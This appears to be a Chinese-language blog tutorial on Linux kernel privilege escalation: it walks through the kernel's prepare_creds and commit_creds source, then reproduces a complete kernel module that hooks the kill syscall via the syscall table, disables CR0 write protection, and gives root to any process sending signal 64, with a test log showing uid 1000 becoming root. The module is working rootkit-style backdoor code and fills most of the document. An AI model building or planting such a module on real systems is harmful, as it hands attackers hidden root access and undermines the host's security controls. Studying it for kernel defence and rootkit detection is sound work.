Linux 安全 - 内核提权

前言

在这篇文章：Linux 安全 - Credentials 介绍了 Task Credentials 相关的知识点，接下来给出一个内核编程提权的例程。

一、简介

内核模块提权主要借助于 prepare_creds 函数和 commit_creds 函数，简单代码示例如下：

void set_root(void)
{struct cred *root;root = prepare_creds();if (root == NULL)return;/* Set the credentials to root */commit_creds(root);
}

struct cred {kuid_t		uid;		/* real UID of the task */kgid_t		gid;		/* real GID of the task */kuid_t		suid;		/* saved UID of the task */kgid_t		sgid;		/* saved GID of the task */kuid_t		euid;		/* effective UID of the task */kgid_t		egid;		/* effective GID of the task */kuid_t		fsuid;		/* UID for VFS ops */kgid_t		fsgid;		/* GID for VFS ops */
}

在set_root函数中把struct cred 以上成员改为0。

/* Whatever calls this function will have it's creds struct replaced* with root's */
void set_root(void)
{/* prepare_creds returns the current credentials of the process */struct cred *root;root = prepare_creds();if (root == NULL)return;/* Run through and set all the various *id's to 0 (root) */root->uid.val = root->gid.val = 0;root->euid.val = root->egid.val = 0;root->suid.val = root->sgid.val = 0;root->fsuid.val = root->fsgid.val = 0;/* Set the cred struct that we've modified to that of the calling process */commit_creds(root);
}

1.1 prepare_creds

static struct kmem_cache *cred_jar;

/*** prepare_creds - Prepare a new set of credentials for modification** Prepare a new set of task credentials for modification.  A task's creds* shouldn't generally be modified directly, therefore this function is used to* prepare a new copy, which the caller then modifies and then commits by* calling commit_creds().** Preparation involves making a copy of the objective creds for modification.** Returns a pointer to the new creds-to-be if successful, NULL otherwise.** Call commit_creds() or abort_creds() to clean up.*/
struct cred *prepare_creds(void)
{struct task_struct *task = current;const struct cred *old;struct cred *new;validate_process_creds();new = kmem_cache_alloc(cred_jar, GFP_KERNEL);if (!new)return NULL;kdebug("prepare_creds() alloc %p", new);old = task->cred;memcpy(new, old, sizeof(struct cred));new->non_rcu = 0;atomic_set(&new->usage, 1);set_cred_subscribers(new, 0);get_group_info(new->group_info);get_uid(new->user);get_user_ns(new->user_ns);#ifdef CONFIG_KEYSkey_get(new->session_keyring);key_get(new->process_keyring);key_get(new->thread_keyring);key_get(new->request_key_auth);
#endif#ifdef CONFIG_SECURITYnew->security = NULL;
#endifif (security_prepare_creds(new, old, GFP_KERNEL_ACCOUNT) < 0)goto error;validate_creds(new);return new;error:abort_creds(new);return NULL;
}
EXPORT_SYMBOL(prepare_creds);

prepare_creds() 函数的目的是为修改准备一个新的任务凭证集。它设计为创建现有凭证的副本，以便调用者可以在不直接修改原始凭证的情况下修改副本。这确保了在使用 commit_creds() 提交之前，原始凭证保持不变。

函数源码解析：
（1）内存分配：该函数使用 kmem_cache_alloc() 为新凭证结构（new）分配内存。它利用了 cred_jar 内存缓存，这是一个预分配的凭证内存池。这有助于通过避免频繁的动态内存分配来提高性能。

（2）复制现有凭证：函数使用 memcpy() 将现有凭证（old）的内容复制到新分配的凭证（new）中。这创建了一个初始的凭证副本，可以独立地进行修改。

（3）设置凭证属性：在复制现有凭证之后，函数为新凭证设置各种属性。这些属性包括 non_rcu（设置为 0）、usage（设置为 1，表示对凭证的一个引用）以及与组信息、用户标识符和用户命名空间相关的其他字段。

（4）密钥管理：如果内核配置选项 CONFIG_KEYS 已启用，函数调用 key_get() 来增加凭证结构中与密钥相关字段的引用计数。这确保了与凭证关联的密钥得到正确的计数，避免了过早释放。

（5）安全模块集成：如果内核配置选项 CONFIG_SECURITY 已启用，新凭证的 security 字段将设置为 NULL。该字段通常用于存储与凭证关联的安全模块特定数据的引用。

（6）安全模块钩子：函数调用安全模块提供的 security_prepare_creds() 钩子。这允许安全模块对新凭证执行任何必要的操作或验证。如果安全模块返回小于 0 的值，表示发生错误，函数跳转到 error 标签处处理错误并进行清理。

（7）验证：在准备新凭证之后，函数调用 validate_creds() 来验证新凭证结构的完整性和一致性。

（8）返回值：如果准备成功，函数返回新凭证的指针（new）。如果在准备过程中发生任何错误，函数调用 abort_creds() 释放已分配的内存，并返回 NULL。

通过结合使用 prepare_creds() 和 commit_creds()，Linux 内核提供了一个安全的机制，在修改任务凭证时保持原始凭证不变，直到更改被提交。这是内核安全基础设施的重要组成部分，允许对系统内的访问权限和特权进行细粒度控制。

1.2 commit_creds

/*** commit_creds - Install new credentials upon the current task* @new: The credentials to be assigned** Install a new set of credentials to the current task, using RCU to replace* the old set.  Both the objective and the subjective credentials pointers are* updated.  This function may not be called if the subjective credentials are* in an overridden state.** This function eats the caller's reference to the new credentials.** Always returns 0 thus allowing this function to be tail-called at the end* of, say, sys_setgid().*/
int commit_creds(struct cred *new)
{struct task_struct *task = current;const struct cred *old = task->real_cred;kdebug("commit_creds(%p{%d,%d})", new,atomic_read(&new->usage),read_cred_subscribers(new));BUG_ON(task->cred != old);
#ifdef CONFIG_DEBUG_CREDENTIALSBUG_ON(read_cred_subscribers(old) < 2);validate_creds(old);validate_creds(new);
#endifBUG_ON(atomic_read(&new->usage) < 1);get_cred(new); /* we will require a ref for the subj creds too *//* dumpability changes */if (!uid_eq(old->euid, new->euid) ||!gid_eq(old->egid, new->egid) ||!uid_eq(old->fsuid, new->fsuid) ||!gid_eq(old->fsgid, new->fsgid) ||!cred_cap_issubset(old, new)) {if (task->mm)set_dumpable(task->mm, suid_dumpable);task->pdeath_signal = 0;/** If a task drops privileges and becomes nondumpable,* the dumpability change must become visible before* the credential change; otherwise, a __ptrace_may_access()* racing with this change may be able to attach to a task it* shouldn't be able to attach to (as if the task had dropped* privileges without becoming nondumpable).* Pairs with a read barrier in __ptrace_may_access().*/smp_wmb();}/* alter the thread keyring */if (!uid_eq(new->fsuid, old->fsuid))key_fsuid_changed(new);if (!gid_eq(new->fsgid, old->fsgid))key_fsgid_changed(new);/* do it* RLIMIT_NPROC limits on user->processes have already been checked* in set_user().*/alter_cred_subscribers(new, 2);if (new->user != old->user)atomic_inc(&new->user->processes);rcu_assign_pointer(task->real_cred, new);rcu_assign_pointer(task->cred, new);if (new->user != old->user)atomic_dec(&old->user->processes);alter_cred_subscribers(old, -2);/* send notifications */if (!uid_eq(new->uid,   old->uid)  ||!uid_eq(new->euid,  old->euid) ||!uid_eq(new->suid,  old->suid) ||!uid_eq(new->fsuid, old->fsuid))proc_id_connector(task, PROC_EVENT_UID);if (!gid_eq(new->gid,   old->gid)  ||!gid_eq(new->egid,  old->egid) ||!gid_eq(new->sgid,  old->sgid) ||!gid_eq(new->fsgid, old->fsgid))proc_id_connector(task, PROC_EVENT_GID);/* release the old obj and subj refs both */put_cred(old);put_cred(old);return 0;
}
EXPORT_SYMBOL(commit_creds);

commit_creds() 负责处理进程的凭证安装。它确保凭证的一致性和完整性，更新各种属性，并在必要时发送通知。

二、demo

源代码来自于：https://github.com/chronolator/LKM-SetRootPerms

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/syscalls.h>
#include <linux/version.h>#define LICENSE			"GPL"
#define AUTHOR			"Chronolator"
#define DESCRIPTION		"LKM example of setting process to root perms."
#define VERSION			"0.01"/* Module meta data */
MODULE_LICENSE(LICENSE);
MODULE_AUTHOR(AUTHOR);
MODULE_DESCRIPTION(DESCRIPTION);
MODULE_VERSION(VERSION);/* Preprocessing Definitions */
#define MODULE_NAME "SetRootPerms"
#if LINUX_VERSION_CODE >= KERNEL_VERSION(5,7,0)#define KPROBE_LOOKUP 1#include <linux/kprobes.h>static struct kprobe kp = {.symbol_name = "kallsyms_lookup_name"};
#endif/* Global Variables */
unsigned long cr0;
static unsigned long *__sys_call_table;/* Function Prototypes*/
unsigned long *get_syscall_table_bf(void);
#if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0)static inline void write_cr0_forced(unsigned long val);
#endif
static inline void SetProtectedMode(void);
static inline void SetRealMode(void);
void give_root(void);
#if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0)typedef asmlinkage long (*t_syscall)(const struct pt_regs *regs);static t_syscall original_kill;//asmlinkage long (*original_kill)(const struct pt_regs *regs); //OLDasmlinkage long hacked_kill(const struct pt_regs *regs);
#elsetypedef asmlinkage long (*original_kill_t)(pid_t, int);original_kill_t original_kill;//asmlinkage long (*original_kill)(int pid, int sig); //OLDasmlinkage long hacked_kill(int pid, int sig);
#endif/* Get syscall table */
unsigned long *get_syscall_table_bf(void) {unsigned long *syscall_table;#if LINUX_VERSION_CODE > KERNEL_VERSION(4, 4, 0)#ifdef KPROBE_LOOKUPtypedef unsigned long (*kallsyms_lookup_name_t)(const char *name);kallsyms_lookup_name_t kallsyms_lookup_name;register_kprobe(&kp);kallsyms_lookup_name = (kallsyms_lookup_name_t) kp.addr;unregister_kprobe(&kp);#endifsyscall_table = (unsigned long*)kallsyms_lookup_name("sys_call_table");return syscall_table;#elseunsigned long int i;for (i = (unsigned long int)sys_close; i < ULONG_MAX; i += sizeof(void *)) {syscall_table = (unsigned long *)i;if (syscall_table[__NR_close] == (unsigned long)sys_close)return syscall_table;}return NULL;#endif
}/* Bypass write_cr0() restrictions by writing directly to the cr0 register */
#if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0)
static inline void write_cr0_forced(unsigned long val) {unsigned long __force_order;asm volatile("mov %0, %%cr0": "+r"(val), "+m"(__force_order));
}
#endif/* Set CPU to protected mode by modifying value stored in cr0 register */
static inline void SetProtectedMode(void) {
#if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0)write_cr0_forced(cr0);
#elsewrite_cr0(cr0);
#endif
}/* Set CPU to real mode by modifying value stored in cr0 register */
static inline void SetRealMode(void) {
#if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0)write_cr0_forced(cr0 & ~0x00010000);
#elsewrite_cr0(cr0 & ~0x00010000);
#endif
}/* Misc Functions */
void give_root(void) {
#if LINUX_VERSION_CODE < KERNEL_VERSION(2, 6, 29)current->uid = current->gid = 0;current->euid = current->egid = 0;current->suid = current->sgid = 0;current->fsuid = current->fsgid = 0;
#elsestruct cred *newcreds;newcreds = prepare_creds();if (newcreds == NULL)return;#if LINUX_VERSION_CODE >= KERNEL_VERSION(3, 5, 0) && defined(CONFIG_UIDGID_STRICT_TYPE_CHECKS) || LINUX_VERSION_CODE >= KERNEL_VERSION(3, 14, 0)newcreds->uid.val = newcreds->gid.val = 0;newcreds->euid.val = newcreds->egid.val = 0;newcreds->suid.val = newcreds->sgid.val = 0;newcreds->fsuid.val = newcreds->fsgid.val = 0;#elsenewcreds->uid = newcreds->gid = 0;newcreds->euid = newcreds->egid = 0;newcreds->suid = newcreds->sgid = 0;newcreds->fsuid = newcreds->fsgid = 0;#endifcommit_creds(newcreds);
#endif
}/* Hacked Syscalls */
#if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0)
asmlinkage long hacked_kill(const struct pt_regs *regs) {printk(KERN_WARNING "%s module: Called syscall kill using new pt_regs", MODULE_NAME);pid_t pid = regs->di;int sig = regs->si;if(sig == 64) {printk(KERN_INFO "%s module: Giving root\n", MODULE_NAME);give_root();        return 0;}return (*original_kill)(regs);
}
#else
asmlinkage long hacked_kill(pid_t pid, int sig) {printk(KERN_WARNING "%s module: Called syscall kill", MODULE_NAME);//struct task_struct *task;if(sig == 64) {printk(KERN_INFO "%s module: Giving root using old asmlinkage\n", MODULE_NAME);give_root(); return 0;}return (*original_kill)(pid, sig);
}
#endif/* Init */
static int __init run_init(void) {printk(KERN_INFO "%s module: Initializing module\n", MODULE_NAME);// Get syscall table __sys_call_table = get_syscall_table_bf();if (!__sys_call_table)return -1;// Get the value in the cr0 registercr0 = read_cr0();// Set the actual syscalls to the "original" linked versions (save the actual in another variable)#if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0)original_kill = (t_syscall)__sys_call_table[__NR_kill];//original_kill = (original_kill)__sys_call_table[__NR_kill]; //OLD#elseoriginal_kill = (original_kill_t)__sys_call_table[__NR_kill];//original_kill = (void*)__sys_call_table[__NR_kill]; //OLD#endif// Set the syscalls to your modified versionsSetRealMode();__sys_call_table[__NR_kill] = (unsigned long)hacked_kill;SetProtectedMode();return 0;
}/* Exit */
static void __exit run_exit(void) {printk(KERN_INFO "%s module: Exiting module\n", MODULE_NAME);// Set the syscalls back to the "original" linked versionsSetRealMode();__sys_call_table[__NR_kill] = (unsigned long)original_kill;SetProtectedMode();return;
}module_init(run_init);
module_exit(run_exit);

测试结果：

$ id
uid=1000(yl) gid=1000(yl) 
$ kill -64 0
$ id
uid=0(root) gid=0(root) 

参考资料

https://github.com/chronolator/LKM-SetRootPerms
https://xcellerator.github.io/posts/linux_rootkits_03/